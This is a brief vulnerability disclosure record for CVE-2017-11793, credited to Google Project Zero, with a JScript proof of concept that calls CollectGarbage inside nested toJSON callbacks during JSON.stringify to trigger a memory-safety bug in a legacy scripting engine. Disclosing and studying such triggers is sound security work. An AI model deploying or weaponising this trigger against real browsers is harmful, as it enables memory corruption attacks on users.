
CVE-2017-11793

  • Report: Oct 2017
  • Fix: Dec 2017
  • Credit: ifratric of Google Project Zero

PoC

<script language="Jscript.Encode">

var o1 = {toJSON:function(){
  alert('o1');
  return [o2];
}}

var o2 = {toJSON:function(){
  alert('o2');
  CollectGarbage();
  return 'x';
}}

JSON.stringify(o1);

</script>

Reference